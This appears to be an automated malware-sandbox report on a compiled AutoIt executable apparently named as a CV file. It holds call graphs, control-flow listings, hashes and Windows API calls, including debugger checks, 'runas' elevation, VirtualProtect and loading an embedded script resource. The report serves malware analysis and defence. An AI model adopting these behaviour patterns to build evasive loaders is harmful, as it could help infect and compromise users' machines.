335 API calls 2 library calls 94736->94797 94798 391d10 59 API calls Mailbox 94736->94798 94806 3ccc5c 86 API calls 4 library calls 94737->94806 94740 3fa982 94803 3ccc5c 86 API calls 4 library calls 94741->94803 94742 3de822 335 API calls 94742->94744 94743 39f4ea 48 API calls 94743->94744 94744->94733 94744->94736 94744->94739 94744->94742 94744->94743 94745 38fe30 335 API calls 94744->94745 94746 3fa706 94744->94746 94748 391526 Mailbox 94744->94748 94749 3b97ed InterlockedDecrement 94744->94749 94752 3d6ff0 335 API calls 94744->94752 94753 3e0d09 94744->94753 94756 3e0d1d 94744->94756 94759 3df0ac 94744->94759 94791 3ca6ef 94744->94791 94799 3def61 82 API calls 2 library calls 94744->94799 94745->94744 94801 3ccc5c 86 API calls 4 library calls 94746->94801 94802 3ccc5c 86 API calls 4 library calls 94748->94802 94749->94744 94752->94744 94807 3df8ae 94753->94807 94755 3e0d19 94755->94744 94757 3df8ae 129 API calls 94756->94757 94758 3e0d2d 94757->94758 94758->94744 94760 38d7f7 48 API calls 94759->94760 94761 3df0c0 94760->94761 94762 38d7f7 48 API calls 94761->94762 94763 3df0c8 94762->94763 94764 38d7f7 48 API calls 94763->94764 94765 3df0d0 94764->94765 94766 38936c 81 API calls 94765->94766 94770 3df0de 94766->94770 94767 386a63 48 API calls 94767->94770 94768 3df2f9 Mailbox 94768->94744 94770->94767 94770->94768 94771 3df2b3 94770->94771 94773 3df2ce 94770->94773 94775 38c799 48 API calls 94770->94775 94777 386eed 48 API calls 94770->94777 94778 38bdfa 48 API calls 94770->94778 94782 3df2cc 94770->94782 94784 38bdfa 48 API calls 94770->94784 94788 38936c 81 API calls 94770->94788 94789 38510d 48 API calls 94770->94789 94790 38518c 48 API calls 94770->94790 94772 38518c 48 API calls 94771->94772 94774 3df2c0 94772->94774 94776 38518c 48 API calls 94773->94776 94779 38510d 48 API calls 94774->94779 94775->94770 94780 3df2dd 94776->94780 94777->94770 94781 3df175 CharUpperBuffW 94778->94781 94779->94782 94783 38510d 48 API calls 94780->94783 94786 38d645 53 API calls 94781->94786 94782->94768 94909 386b68 48 API calls 94782->94909 94783->94782 94785 3df23a CharUpperBuffW 94784->94785 94908 39d922 55 API calls 2 library calls 94785->94908 94786->94770 94788->94770 94789->94770 94790->94770 94792 3ca6fb 94791->94792 94793 39f4ea 48 API calls 94792->94793 94794 3ca709 94793->94794 94795 3ca717 94794->94795 94796 38d7f7 48 API calls 94794->94796 94795->94744 94796->94795 94797->94736 94798->94736 94799->94744 94800->94739 94801->94748 94802->94739 94803->94739 94804->94730 94805->94724 94806->94740 94808 38936c 81 API calls 94807->94808 94809 3df8ea 94808->94809 94832 3df92c Mailbox 94809->94832 94843 3e0567 94809->94843 94811 3dfb8b 94812 3dfcfa 94811->94812 94816 3dfb95 94811->94816 94891 3e0688 89 API calls Mailbox 94812->94891 94815 3dfd07 94815->94816 94818 3dfd13 94815->94818 94856 3df70a 94816->94856 94817 38936c 81 API calls 94840 3df984 Mailbox 94817->94840 94818->94832 94823 3dfbc9 94870 39ed18 94823->94870 94826 3dfbfd 94828 39c050 48 API calls 94826->94828 94827 3dfbe3 94889 3ccc5c 86 API calls 4 library calls 94827->94889 94830 3dfc14 94828->94830 94833 391b90 48 API calls 94830->94833 94842 3dfc3e 94830->94842 94831 3dfbee GetCurrentProcess TerminateProcess 94831->94826 94832->94755 94835 3dfc2d 94833->94835 94834 3dfd65 94834->94832 94838 3dfd7e FreeLibrary 94834->94838 94836 3e040f 105 API calls 94835->94836 94836->94842 94837 391b90 48 API calls 94837->94842 94838->94832 94840->94811 94840->94817 94840->94832 94840->94840 94887 3e29e8 48 API calls _memcpy_s 94840->94887 94888 3dfda5 60 API calls 2 library calls 94840->94888 94842->94834 94842->94837 94874 3e040f 94842->94874 94890 38dcae 50 API calls Mailbox 94842->94890 94844 38bdfa 48 API calls 94843->94844 94845 3e0582 CharLowerBuffW 94844->94845 94892 3c1f11 94845->94892 94849 38d7f7 48 API calls 94850 3e05bb 94849->94850 94899 3869e9 48 API calls _memcpy_s 94850->94899 94852 3e05d2 94853 38b18b 48 API calls 94852->94853 94854 3e05de Mailbox 94853->94854 94855 3e061a Mailbox 94854->94855 94900 3dfda5 60 API calls 2 library calls 94854->94900 94855->94840 94857 3df725 94856->94857 94861 3df77a 94856->94861 94858 39f4ea 48 API calls 94857->94858 94859 3df747 94858->94859 94860 39f4ea 48 API calls 94859->94860 94859->94861 94860->94859 94862 3e0828 94861->94862 94863 3e0a53 Mailbox 94862->94863 94868 3e084b _strcat _wcscpy __NMSG_WRITE 94862->94868 94863->94823 94864 38cf93 58 API calls 94864->94868 94865 38d286 48 API calls 94865->94868 94866 38936c 81 API calls 94866->94868 94867 3a395c 47 API calls __crtLCMapStringA_stat 94867->94868 94868->94863 94868->94864 94868->94865 94868->94866 94868->94867 94903 3c8035 50 API calls __NMSG_WRITE 94868->94903 94871 39ed2d 94870->94871 94872 39edc5 VirtualProtect 94871->94872 94873 39ed93 94871->94873 94872->94873 94873->94826 94873->94827 94875 3e0427 94874->94875 94880 3e0443 94874->94880 94876 3e042e 94875->94876 94877 3e044f 94875->94877 94878 3e04f8 94875->94878 94875->94880 94904 3c7c56 50 API calls _strlen 94876->94904 94906 38cdb9 48 API calls 94877->94906 94907 3c9dc5 103 API calls 94878->94907 94879 3e051e 94879->94842 94880->94879 94883 3a1c9d _free 47 API calls 94880->94883 94883->94879 94885 3e0438 94905 38cdb9 48 API calls 94885->94905 94887->94840 94888->94840 94889->94831 94890->94842 94891->94815 94893 3c1f3b __NMSG_WRITE 94892->94893 94894 3c1f79 94893->94894 94895 3c1f6f 94893->94895 94897 3c1ffa 94893->94897 94894->94849 94894->94854 94895->94894 94901 39d37a 60 API calls 94895->94901 94897->94894 94902 39d37a 60 API calls 94897->94902 94899->94852 94900->94855 94901->94895 94902->94897 94903->94868 94904->94885 94905->94880 94906->94880 94907->94880 94908->94770 94909->94768 94910 3f19cb 94915 382322 94910->94915 94912 3f19d1 94948 3a0f0a 52 API calls __cinit 94912->94948 94914 3f19db 94916 382344 94915->94916 94949 3826df 94916->94949 94921 38d7f7 48 API calls 94922 382384 94921->94922 94923 38d7f7 48 API calls 94922->94923 94924 38238e 94923->94924 94925 38d7f7 48 API calls 94924->94925 94926 382398 94925->94926 94927 38d7f7 48 API calls 94926->94927 94928 3823de 94927->94928 94929 38d7f7 48 API calls 94928->94929 94930 3824c1 94929->94930 94957 38263f 94930->94957 94934 3824f1 94935 38d7f7 48 API calls 94934->94935 94936 3824fb 94935->94936 94986 382745 94936->94986 94938 382546 94939 382556 GetStdHandle 94938->94939 94940 3f501d 94939->94940 94941 3825b1 94939->94941 94940->94941 94942 3f5026 94940->94942 94943 3825b7 CoInitialize 94941->94943 94993 3c92d4 53 API calls 94942->94993 94943->94912 94945 3f502d 94994 3c99f9 CreateThread 94945->94994 94947 3f5039 CloseHandle 94947->94943 94948->94914 94995 382854 94949->94995 94952 386a63 48 API calls 94953 38234a 94952->94953 94954 38272e 94953->94954 95009 3827ec 6 API calls 94954->95009 94956 38237a 94956->94921 94958 38d7f7 48 API calls 94957->94958 94959 38264f 94958->94959 94960 38d7f7 48 API calls 94959->94960 94961 382657 94960->94961 95010 3826a7 94961->95010 94964 3826a7 48 API calls 94965 382667 94964->94965 94966 38d7f7 48 API calls 94965->94966 94967 382672 94966->94967 94968 39f4ea 48 API calls 94967->94968 94969 3824cb 94968->94969 94970 3822a4 94969->94970 94971 3822b2 94970->94971 94972 38d7f7 48 API calls 94971->94972 94973 3822bd 94972->94973 94974 38d7f7 48 API calls 94973->94974 94975 3822c8 94974->94975 94976 38d7f7 48 API calls 94975->94976 94977 3822d3 94976->94977 94978 38d7f7 48 API calls 94977->94978 94979 3822de 94978->94979 94980 3826a7 48 API calls 94979->94980 94981 3822e9 94980->94981 94982 39f4ea 48 API calls 94981->94982 94983 3822f0 94982->94983 94984 3822f9 RegisterWindowMessageW 94983->94984 94985 3f1fe7 94983->94985 94984->94934 94987 3f5f4d 94986->94987 94988 382755 94986->94988 95015 3cc942 50 API calls 94987->95015 94989 39f4ea 48 API calls 94988->94989 94991 38275d 94989->94991 94991->94938 94992 3f5f58 94993->94945 94994->94947 95016 3c99df 54 API calls 94994->95016 95002 382870 94995->95002 94998 382870 48 API calls 94999 382864 94998->94999 95000 38d7f7 48 API calls 94999->95000 95001 382716 95000->95001 95001->94952 95003 38d7f7 48 API calls 95002->95003 95004 38287b 95003->95004 95005 38d7f7 48 API calls 95004->95005 95006 382883 95005->95006 95007 38d7f7 48 API calls 95006->95007 95008 38285c 95007->95008 95008->94998 95009->94956 95011 38d7f7 48 API calls 95010->95011 95012 3826b0 95011->95012 95013 38d7f7 48 API calls 95012->95013 95014 38265f 95013->95014 95014->94964 95015->94992 95017 19fc3a8 95018 19f9ff8 GetPEB 95017->95018 95019 19fc488 95018->95019 95031 19fc298 95019->95031 95032 19fc2a1 Sleep 95031->95032 95033 19fc2af 95032->95033 95034 3cbb64 95035 3cbb77 95034->95035 95036 3cbb71 95034->95036 95037 3cbb88 95035->95037 95039 3a1c9d _free 47 API calls 95035->95039 95038 3a1c9d _free 47 API calls 95036->95038 95040 3cbb9a 95037->95040 95041 3a1c9d _free 47 API calls 95037->95041 95038->95035 95039->95037 95041->95040 95042 38ef80 95043 393b70 335 API calls 95042->95043 95044 38ef8c 95043->95044 95045 3f9c06 95056 39d3be 95045->95056 95047 3f9c1c 95048 3f9c91 Mailbox 95047->95048 95065 381caa 49 API calls 95047->95065 95051 393200 335 API calls 95048->95051 95050 3f9cc5 95054 3fa7ab Mailbox 95050->95054 95067 3ccc5c 86 API calls 4 library calls 95050->95067 95051->95050 95052 3f9c71 95052->95050 95066 3cb171 48 API calls 95052->95066 95057 39d3ca 95056->95057 95058 39d3dc 95056->95058 95068 38dcae 50 API calls Mailbox 95057->95068 95059 39d40b 95058->95059 95060 39d3e2 95058->95060 95069 38dcae 50 API calls Mailbox 95059->95069 95062 39f4ea 48 API calls 95060->95062 95064 39d3d4 95062->95064 95064->95047 95065->95052 95066->95048 95067->95054 95068->95064 95069->95064 95070 383742 95071 38374b 95070->95071 95072 3837c8 95071->95072 95073 383769 95071->95073 95109 3837c6 95071->95109 95077 3837ce 95072->95077 95078 3f1e00 95072->95078 95074 38382c PostQuitMessage 95073->95074 95075 383776 95073->95075 95082 3837b9 95074->95082 95080 3f1e88 95075->95080 95081 383781 95075->95081 95076 3837ab DefWindowProcW 95076->95082 95083 3837d3 95077->95083 95084 3837f6 SetTimer RegisterWindowMessageW 95077->95084 95125 382ff6 16 API calls 95078->95125 95130 3c4ddd 60 API calls _memset 95080->95130 95086 383789 95081->95086 95087 383836 95081->95087 95090 3837da KillTimer 95083->95090 95091 3f1da3 95083->95091 95084->95082 95088 38381f CreatePopupMenu 95084->95088 95085 3f1e27 95126 39e312 335 API calls Mailbox 95085->95126 95093 3f1e6d 95086->95093 95094 383794 95086->95094 95115 39eb83 95087->95115 95088->95082 95122 383847 Shell_NotifyIconW _memset 95090->95122 95097 3f1ddc MoveWindow 95091->95097 95098 3f1da8 95091->95098 95093->95076 95129 3ba5f3 48 API calls 95093->95129 95101 38379f 95094->95101 95102 3f1e58 95094->95102 95095 3f1e9a 95095->95076 95095->95082 95097->95082 95103 3f1dac 95098->95103 95104 3f1dcb SetFocus 95098->95104 95100 3837ed 95123 38390f DeleteObject DestroyWindow Mailbox 95100->95123 95101->95076 95127 383847 Shell_NotifyIconW _memset 95101->95127 95128 3c55bd 70 API calls _memset 95102->95128 95103->95101 95107 3f1db5 95103->95107 95104->95082 95124 382ff6 16 API calls 95107->95124 95109->95076 95111 3f1e68 95111->95082 95113 3f1e4c 95114 384ffc 67 API calls 95113->95114 95114->95109 95116 39eb9a _memset 95115->95116 95117 39ec1c 95115->95117 95118 3851af 50 API calls 95116->95118 95117->95082 95120 39ebc1 95118->95120 95119 39ec05 KillTimer SetTimer 95119->95117 95120->95119 95121 3f3c7a Shell_NotifyIconW 95120->95121 95121->95119 95122->95100 95123->95082 95124->95082 95125->95085 95126->95101 95127->95113 95128->95111 95129->95109 95130->95095

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 644 3ab043-3ab080 call 3af8a0 647 3ab089-3ab08b 644->647 648 3ab082-3ab084 644->648 650 3ab0ac-3ab0d9 647->650 651 3ab08d-3ab0a7 call 3a7bda call 3a7c0e call 3a6e10 647->651 649 3ab860-3ab86c call 3aa70c 648->649 654 3ab0db-3ab0de 650->654 655 3ab0e0-3ab0e7 650->655 651->649 654->655 658 3ab10b-3ab110 654->658 659 3ab0e9-3ab100 call 3a7bda call 3a7c0e call 3a6e10 655->659 660 3ab105 655->660 662 3ab11f-3ab12d call 3b3bf2 658->662 663 3ab112-3ab11c call 3af82f 658->663 690 3ab851-3ab854 659->690 660->658 675 3ab44b-3ab45d 662->675 676 3ab133-3ab145 662->676 663->662 677 3ab7b8-3ab7d5 WriteFile 675->677 678 3ab463-3ab473 675->678 676->675 680 3ab14b-3ab183 call 3a7a0d GetConsoleMode 676->680 684 3ab7e1-3ab7e7 GetLastError 677->684 685 3ab7d7-3ab7df 677->685 681 3ab55a-3ab55f 678->681 682 3ab479-3ab484 678->682 680->675 694 3ab189-3ab18f 680->694 692 3ab663-3ab66e 681->692 693 3ab565-3ab56e 681->693 688 3ab48a-3ab49a 682->688 689 3ab81b-3ab833 682->689 691 3ab7e9 684->691 685->691 695 3ab4a0-3ab4a3 688->695 696 3ab83e-3ab84e call 3a7c0e call 3a7bda 689->696 697 3ab835-3ab838 689->697 701 3ab85e-3ab85f 690->701 699 3ab7ef-3ab7f1 691->699 692->689 698 3ab674 692->698 693->689 700 3ab574 693->700 702 3ab199-3ab1bc GetConsoleCP 694->702 703 3ab191-3ab193 694->703 704 3ab4e9-3ab520 WriteFile 695->704 705 3ab4a5-3ab4be 695->705 696->690 697->696 706 3ab83a-3ab83c 697->706 707 3ab67e-3ab693 698->707 709 3ab7f3-3ab7f5 699->709 710 3ab856-3ab85c 699->710 711 3ab57e-3ab595 700->711 701->649 712 3ab1c2-3ab1ca 702->712 713 3ab440-3ab446 702->713 703->675 703->702 704->684 716 3ab526-3ab538 704->716 714 3ab4cb-3ab4e7 705->714 715 3ab4c0-3ab4ca 705->715 706->701 717 3ab699-3ab69b 707->717 709->689 719 3ab7f7-3ab7fc 709->719 710->701 720 3ab59b-3ab59e 711->720 723 3ab1d4-3ab1d6 712->723 713->709 714->695 714->704 715->714 716->699 724 3ab53e-3ab54f 716->724 725 3ab6d8-3ab719 WideCharToMultiByte 717->725 726 3ab69d-3ab6b3 717->726 728 3ab7fe-3ab810 call 3a7c0e call 3a7bda 719->728 729 3ab812-3ab819 call 3a7bed 719->729 721 3ab5de-3ab627 WriteFile 720->721 722 3ab5a0-3ab5b6 720->722 721->684 732 3ab62d-3ab645 721->732 730 3ab5b8-3ab5ca 722->730 731 3ab5cd-3ab5dc 722->731 734 3ab36b-3ab36e 723->734 735 3ab1dc-3ab1fe 723->735 724->688 736 3ab555 724->736 725->684 740 3ab71f-3ab721 725->740 737 3ab6c7-3ab6d6 726->737 738 3ab6b5-3ab6c4 726->738 728->690 729->690 730->731 731->720 731->721 732->699 744 3ab64b-3ab658 732->744 748 3ab370-3ab373 734->748 749 3ab375-3ab3a2 734->749 746 3ab200-3ab215 735->746 747 3ab217-3ab223 call 3a1688 735->747 736->699 737->717 737->725 738->737 742 3ab727-3ab75a WriteFile 740->742 750 3ab77a-3ab78e GetLastError 742->750 751 3ab75c-3ab776 742->751 744->711 753 3ab65e 744->753 754 3ab271-3ab283 call 3b40f7 746->754 768 3ab269-3ab26b 747->768 769 3ab225-3ab239 747->769 748->749 756 3ab3a8-3ab3ab 748->756 749->756 762 3ab794-3ab796 750->762 751->742 759 3ab778 751->759 753->699 771 3ab289 754->771 772 3ab435-3ab43b 754->772 757 3ab3ad-3ab3b0 756->757 758 3ab3b2-3ab3c5 call 3b5884 756->758 757->758 764 3ab407-3ab40a 757->764 758->684 777 3ab3cb-3ab3d5 758->777 759->762 762->691 767 3ab798-3ab7b0 762->767 764->723 774 3ab410 764->774 767->707 773 3ab7b6 767->773 768->754 775 3ab23f-3ab254 call 3b40f7 769->775 776 3ab412-3ab42d 769->776 778 3ab28f-3ab2c4 WideCharToMultiByte 771->778 772->691 773->699 774->772 775->772 786 3ab25a-3ab267 775->786 776->772 780 3ab3fb-3ab401 777->780 781 3ab3d7-3ab3ee call 3b5884 777->781 778->772 782 3ab2ca-3ab2f0 WriteFile 778->782 780->764 781->684 789 3ab3f4-3ab3f5 781->789 782->684 785 3ab2f6-3ab30e 782->785 785->772 788 3ab314-3ab31b 785->788 786->778 788->780 790 3ab321-3ab34c WriteFile 788->790 789->780 790->684 791 3ab352-3ab359 790->791 791->772 792 3ab35f-3ab366 791->792 792->780
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dcfba9208c50519421da5631e244e2b556c93cbbd403ec3255150d90c728fe14
                                                                                        • Instruction ID: fdef2f1591fc5575ad107093842b1a02ff503790f9a3febbda27c1cdfee2baf2
                                                                                        • Opcode Fuzzy Hash: dcfba9208c50519421da5631e244e2b556c93cbbd403ec3255150d90c728fe14
                                                                                        • Instruction Fuzzy Hash: 6B325E75B022288BCB26CF55DC816E9B7B5FF4B310F1941D9E40AA7A92D7349E80CF52

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00383AA3,?), ref: 00383D45
                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,00383AA3,?), ref: 00383D57
                                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,00441148,00441130,?,?,?,?,00383AA3,?), ref: 00383DC8
                                                                                          • Part of subcall function 00386430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00383DEE,00441148,?,?,?,?,?,00383AA3,?), ref: 00386471
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,00383AA3,?), ref: 00383E48
                                                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004328F4,00000010), ref: 003F1CCE
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,00441148,?,?,?,?,?,00383AA3,?), ref: 003F1D06
                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0041DAB4,00441148,?,?,?,?,?,00383AA3,?), ref: 003F1D89
                                                                                        • ShellExecuteW.SHELL32(00000000,?,?,?,?,00383AA3), ref: 003F1D90
                                                                                          • Part of subcall function 00383E6E: GetSysColorBrush.USER32(0000000F), ref: 00383E79
                                                                                          • Part of subcall function 00383E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00383E88
                                                                                          • Part of subcall function 00383E6E: LoadIconW.USER32(00000063), ref: 00383E9E
                                                                                          • Part of subcall function 00383E6E: LoadIconW.USER32(000000A4), ref: 00383EB0
                                                                                          • Part of subcall function 00383E6E: LoadIconW.USER32(000000A2), ref: 00383EC2
                                                                                          • Part of subcall function 00383E6E: RegisterClassExW.USER32(?), ref: 00383F30
                                                                                          • Part of subcall function 003836B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003836E6
                                                                                          • Part of subcall function 003836B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00383707
                                                                                          • Part of subcall function 003836B8: ShowWindow.USER32(00000000,?,?,?,?,00383AA3,?), ref: 0038371B
                                                                                          • Part of subcall function 003836B8: ShowWindow.USER32(00000000,?,?,?,?,00383AA3,?), ref: 00383724
                                                                                          • Part of subcall function 00384FFC: _memset.LIBCMT ref: 00385022
                                                                                          • Part of subcall function 00384FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003850CB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                        • String ID: ()C$This is a third-party compiled AutoIt script.$runas
                                                                                        • API String ID: 438480954-1437867908
                                                                                        • Opcode ID: b5963e12e2927d7dcb4fe14278fa2f8b73ef0b17490fbd119b2ef7c4e5a0c602
                                                                                        • Instruction ID: e3681d973fa7f2588c110c758da144c6ee58bb17b5c1e62e6e9d0c75d3555776
                                                                                        • Opcode Fuzzy Hash: b5963e12e2927d7dcb4fe14278fa2f8b73ef0b17490fbd119b2ef7c4e5a0c602
                                                                                        • Instruction Fuzzy Hash: 68511835E04348AADF13BBF4DC46EFD7B79AF49B00F0040B5F6416A2A2DA745689CB25

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1076 39ddc0-39de4f call 38d7f7 GetVersionExW call 386a63 call 39dfb4 call 386571 1085 3f24c8-3f24cb 1076->1085 1086 39de55-39de56 1076->1086 1089 3f24cd 1085->1089 1090 3f24e4-3f24e8 1085->1090 1087 39de58-39de63 1086->1087 1088 39de92-39dea2 call 39df77 1086->1088 1093 39de69-39de6b 1087->1093 1094 3f244e-3f2454 1087->1094 1107 39dea4-39dec1 GetCurrentProcess call 39df5f 1088->1107 1108 39dec7-39dee1 1088->1108 1096 3f24d0 1089->1096 1091 3f24ea-3f24f3 1090->1091 1092 3f24d3-3f24dc 1090->1092 1091->1096 1099 3f24f5-3f24f8 1091->1099 1092->1090 1100 3f2469-3f2475 1093->1100 1101 39de71-39de74 1093->1101 1097 3f245e-3f2464 1094->1097 1098 3f2456-3f2459 1094->1098 1096->1092 1097->1088 1098->1088 1099->1092 1103 3f247f-3f2485 1100->1103 1104 3f2477-3f247a 1100->1104 1105 39de7a-39de89 1101->1105 1106 3f2495-3f2498 1101->1106 1103->1088 1104->1088 1111 3f248a-3f2490 1105->1111 1112 39de8f 1105->1112 1106->1088 1113 3f249e-3f24b3 1106->1113 1107->1108 1126 39dec3 1107->1126 1109 39df31-39df3b GetSystemInfo 1108->1109 1110 39dee3-39def7 call 39e00c 1108->1110 1119 39df0e-39df1a 1109->1119 1123 39df29-39df2f GetSystemInfo 1110->1123 1124 39def9-39df01 call 39dff4 GetNativeSystemInfo 1110->1124 1111->1088 1112->1088 1116 3f24bd-3f24c3 1113->1116 1117 3f24b5-3f24b8 1113->1117 1116->1088 1117->1088 1121 39df1c-39df1f FreeLibrary 1119->1121 1122 39df21-39df26 1119->1122 1121->1122 1128 39df03-39df07 1123->1128 1124->1128 1126->1108 1128->1119 1130 39df09-39df0c FreeLibrary 1128->1130 1130->1119
                                                                                        APIs
                                                                                        • GetVersionExW.KERNEL32(?), ref: 0039DDEC
                                                                                        • GetCurrentProcess.KERNEL32(00000000,0041DC38,?,?), ref: 0039DEAC
                                                                                        • GetNativeSystemInfo.KERNELBASE(?,0041DC38,?,?), ref: 0039DF01
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0039DF0C
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0039DF1F
                                                                                        • GetSystemInfo.KERNEL32(?,0041DC38,?,?), ref: 0039DF29
                                                                                        • GetSystemInfo.KERNEL32(?,0041DC38,?,?), ref: 0039DF35
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                        • String ID:
                                                                                        • API String ID: 3851250370-0
                                                                                        • Opcode ID: a7f265f7203c1f36ec6e9108bf49f34642c842839da5d454163b07770dce68ce
                                                                                        • Instruction ID: 40bab6c346e085c658463f149ebfce77721f1009eff6f39a63bce6ae85e0e497
                                                                                        • Opcode Fuzzy Hash: a7f265f7203c1f36ec6e9108bf49f34642c842839da5d454163b07770dce68ce
                                                                                        • Instruction Fuzzy Hash: 5361A4B1C0A384DFCF16CF6898C25EA7FB46F29300B1A49D9D8859F247C674C949CB65

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1148 38406b-384083 CreateStreamOnHGlobal 1149 3840a3-3840a6 1148->1149 1150 384085-38409c FindResourceExW 1148->1150 1151 3f4f16-3f4f25 LoadResource 1150->1151 1152 3840a2 1150->1152 1151->1152 1153 3f4f2b-3f4f39 SizeofResource 1151->1153 1152->1149 1153->1152 1154 3f4f3f-3f4f4a LockResource 1153->1154 1154->1152 1155 3f4f50-3f4f6e 1154->1155 1155->1152
                                                                                        APIs
                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0038449E,?,?,00000000,00000001), ref: 0038407B
                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0038449E,?,?,00000000,00000001), ref: 00384092
                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,0038449E,?,?,00000000,00000001,?,?,?,?,?,?,003841FB), ref: 003F4F1A
                                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,0038449E,?,?,00000000,00000001,?,?,?,?,?,?,003841FB), ref: 003F4F2F
                                                                                        • LockResource.KERNEL32(0038449E,?,?,0038449E,?,?,00000000,00000001,?,?,?,?,?,?,003841FB,00000000), ref: 003F4F42
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                        • String ID: SCRIPT
                                                                                        • API String ID: 3051347437-3967369404
                                                                                        • Opcode ID: d2ae371b05221c34e457ada7d4a5afe2d99de8d6cfc364354ab7913e0a596012
                                                                                        • Instruction ID: d9a916aa7ef59fe10e656717c163d070324311ef2511a51b2ba777d314f01c06
                                                                                        • Opcode Fuzzy Hash: d2ae371b05221c34e457ada7d4a5afe2d99de8d6cfc364354ab7913e0a596012
                                                                                        • Instruction Fuzzy Hash: BD117071600701BFE7229B65ED48F27BBB9EBC5B51F2045ACF60296650DB71DC048B20
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
